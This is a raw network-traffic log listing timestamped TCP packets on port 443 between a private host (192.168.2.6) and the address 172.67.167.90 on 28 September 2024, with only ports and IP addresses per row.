Sep 28, 2024 05:23:30.590625048 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.590646982 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.590687990 CEST	49724	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.590709925 CEST	443	49724	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.697741985 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.697778940 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:30.697855949 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.698194981 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:30.698209047 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.187984943 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.191204071 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.191711903 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.191720963 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.193684101 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.193691015 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.193736076 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.193747044 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.705446959 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.705471039 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.705552101 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.705796957 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.705810070 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.987734079 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.987842083 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.987850904 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.987867117 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:31.987904072 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.987924099 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.988934040 CEST	49725	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:31.988948107 CEST	443	49725	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:32.176086903 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:32.176161051 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.176559925 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.176568031 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:32.178836107 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.178841114 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:32.803823948 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.803879976 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:32.803951025 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.804255009 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:32.804269075 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.070431948 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.070533991 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.070554018 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.070620060 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.070626974 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.070694923 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.070722103 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.070781946 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.071532011 CEST	49726	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.071553946 CEST	443	49726	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.274825096 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.274951935 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.275346041 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.275363922 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.277241945 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.277250051 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.887949944 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.887995958 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:33.888077021 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.888273001 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:33.888289928 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.137698889 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.137881994 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.137907028 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.137943983 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.137965918 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.138123035 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.139028072 CEST	49727	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.139044046 CEST	443	49727	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.378098965 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.378194094 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.378626108 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.378633976 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:34.380528927 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:34.380534887 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.227617025 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.227701902 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.227715969 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.227725983 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.227763891 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.236217022 CEST	49728	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.236232042 CEST	443	49728	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.377115011 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.377181053 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.377266884 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.377512932 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.377525091 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.839332104 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.839433908 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.839921951 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.839950085 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:35.841923952 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:35.841938019 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.422869921 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.422908068 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.422959089 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.423017979 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.423048973 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.423052073 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.423080921 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.423100948 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.423424959 CEST	49729	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.423456907 CEST	443	49729	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.425905943 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.425955057 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.426047087 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.426266909 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.426299095 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.889950991 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.890075922 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.890542030 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.890566111 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:36.892833948 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:36.892857075 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.630522966 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.630583048 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.630646944 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.630673885 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.630686998 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.630721092 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.631023884 CEST	49730	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.631053925 CEST	443	49730	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.649768114 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.649806976 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:37.649883032 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.650161028 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:37.650177002 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.109280109 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.109360933 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.109819889 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.109827995 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.111876965 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.111887932 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.784881115 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.784949064 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.784960985 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.785011053 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.785023928 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.785069942 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.785074949 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.785118103 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.785178900 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:38.785227060 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.786200047 CEST	49731	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:38.786216974 CEST	443	49731	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:39.848280907 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:39.848346949 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:39.848438025 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:39.849898100 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:39.849920034 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.336266041 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.336400986 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.336945057 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.336951971 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.338953018 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.338958025 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.339035988 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.339046001 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.339134932 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.339149952 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.339390039 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.339409113 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.339421034 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.339427948 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:40.344281912 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:40.344295979 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:41.987670898 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:41.987778902 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:41.987807035 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.987831116 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.988341093 CEST	49732	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.988357067 CEST	443	49732	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:41.994683981 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.994720936 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:41.994795084 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.995410919 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:41.995429039 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:42.452466011 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:42.452605009 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:42.454476118 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:42.454489946 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:42.466032982 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:42.466046095 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.278139114 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.278263092 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.278270006 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.278315067 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.278542995 CEST	49734	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.278564930 CEST	443	49734	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.294845104 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.294888020 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.294961929 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.295438051 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.295449972 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.753293991 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.753366947 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.758699894 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.758724928 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.759035110 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.759093046 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.759804964 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.807410955 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.885848999 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.885926962 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.885970116 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886004925 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886017084 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886048079 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886075974 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886105061 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886135101 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886162996 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886168003 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886195898 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886200905 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886230946 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886560917 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886594057 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886603117 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886636019 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886646032 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886679888 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.886684895 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.886718988 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.890544891 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.890615940 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.890635014 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.890666008 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972311020 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972393990 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972420931 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972460032 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972465038 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972501040 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972517014 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972522020 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972532034 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972584963 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.972589016 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.972623110 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.973179102 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.973247051 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.973278999 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.973301888 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.973345995 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.973360062 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.973385096 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.973400116 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974046946 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974092007 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974107981 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974140882 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974144936 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974152088 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974178076 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974190950 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974217892 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974222898 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974252939 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974929094 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.974973917 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.974982023 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.975012064 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.975016117 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.975043058 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.975047112 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.975076914 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:43.975080967 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:43.975110054 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.012923956 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.013008118 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.013036013 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.013073921 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.058938026 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059007883 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059051037 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059077978 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059087992 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059139013 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059158087 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059165955 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059175014 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059211016 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059218884 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059252024 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059262991 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059267044 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.059302092 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059318066 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.059982061 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.060036898 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.060072899 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.060115099 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.060178041 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.060221910 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.060987949 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061033964 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061039925 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061054945 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061067104 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061068058 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061089039 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061093092 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061120033 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061145067 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061903954 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061956882 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.061959028 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061970949 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.061990023 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.062006950 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.062813044 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.062843084 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.062860012 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.062875032 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.062885046 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.062902927 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.063572884 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.063630104 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.099653959 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.099760056 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.145885944 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.145921946 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.145956993 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.145984888 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.145998001 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.146015882 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.146130085 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.146168947 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.146187067 CEST	443	49735	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:44.146239996 CEST	49735	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:44.146965981 CEST	443	49735	172.67.167.90	192.168.2.6
